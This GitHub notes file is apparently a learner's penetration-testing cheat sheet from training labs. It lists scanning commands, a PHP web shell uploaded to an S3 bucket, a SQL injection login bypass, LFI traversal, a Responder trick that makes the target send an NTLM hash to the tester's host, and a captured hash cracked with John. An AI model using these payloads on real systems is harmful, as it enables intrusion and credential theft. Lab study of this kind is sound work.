-
Notifications
You must be signed in to change notification settings - Fork 0
/
Notes
58 lines (47 loc) · 3.86 KB
/
Notes
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
nmap -p- #scans all ports, not just common ones
nmap -p 80 -sV #returns what service and version is running on port 80
nmap -sV #returns what service and version is running on most common ports
nmap -sV -sC #returns what service and version is running on most common ports, as well as performs the default set of script scans
gobuster - used to scan website directories for interesting pages and directories
git clone https://github.com/danielmiessler/SecLists.git #To grab a curated wordlist to scan for
By default, Wordlists on Kali are located in the /usr/share/wordlists directory
gobuster dir --url http://domain.com/ -x php,html --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
gobuster vhost -w /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u http://domain.com #to scan for sub-domains. vhost is for brute-forcing
S3 Buckets:
awscli utility
aws configure #Configures awscli; set temp to each option
aws --endpoint=http://sub.domain.com s3 ls #to list all of the buckets hosted by the S3 server
aws --endpoint=http://sub.domain.com s3 ls s3://domain.com
aws --endpoint=http://sub.domain.com s3 cp shell.php s3://domain.com #To copy files to S3 bucket from our machine
php and sql authentication webpage, depending on the code used, could be susceptible to SQL injection attacks.
Enter anything for the password, it does not matter. Anything after the # will be ignored since it is considered a comment. The username simply needs to match one in the DB.
If so try logging into to a webpage with: USERNAME'#
mysql -h IP_Address -u root #Connect to mysql dB
show databases; #List databses
use DB_name; #Select DB to connect to
show tables; #Show tables of selected DB
select * from table_name; #Returns data from the specific table
Wappalyzer is a browser extension that can show you the make up of a website and the technology it uses (scripts, Apache http, php, jquery, etc).
sudo nano /etc/hosts #to edit hosts file
echo "10.129.128.223 domain.com" | sudo tee -a /etc/hosts #to add to hosts file directly
To create a file via the CLI. In the following case we can use the following PHP one-liner which uses the system() function which takes the URL parameter
cmd as an input and executes it as a system command.
echo '<?php system($_GET["cmd"]); ?>' > shell.php
LFI or Local File Inclusion occurs when an attacker is able to get a website to include a file that was not
intended to be an option for this application. A common example is when an application uses the path to a
file as input. If the application treats this input as trusted, and the required sanitary checks are not
performed on this input, then the attacker can exploit it by using the ../ string in the inputted file name
and eventually view sensitive files in the local file system. In some limited cases, an LFI can lead to code
execution as well.
http://domain.com/index.php?page=../../windows/system32/drivers/etc/hosts
Responder -I tun0
http://domain.com/?page=//MY_IP/bogusfilename
Watch responder to grab user password hash
Grab hash and save to a file
echo "Administrator::DESKTOP-H3OF232:1122334455667788:7E0A87A2CCB487AD9B76C7B0AEAEE133:0101000000000000005F3214B534D
801F0E8BB688484C96C0000000002000800420044004F00320001001E00570049004E002D004E00480045003800440049003400410053004300510004003400570049004E002D004E00480045003800440049003400410
05300430051002E00420044004F0032002E004C004F00430041004C0003001400420044004F0032002E004C004F00430041004C0005001400420044004F0032002E004C004F00430041004C0007000800005F3214B534D
801060004000200000008003000300000000000000001000000002000000C2FAF941D04DCECC6A7691EA92630A77E073056DA8C3F356D47C324C6D6D16F0A0010000000000000000000000000000000000009002000630
06900660073002F00310030002E00310030002E00310034002E00320035000000000000000000" > hash.txt
Try to crack the hash with a wordlist using John the ripper
john -w=/usr/share/wordlists/rockyou.txt hash.txt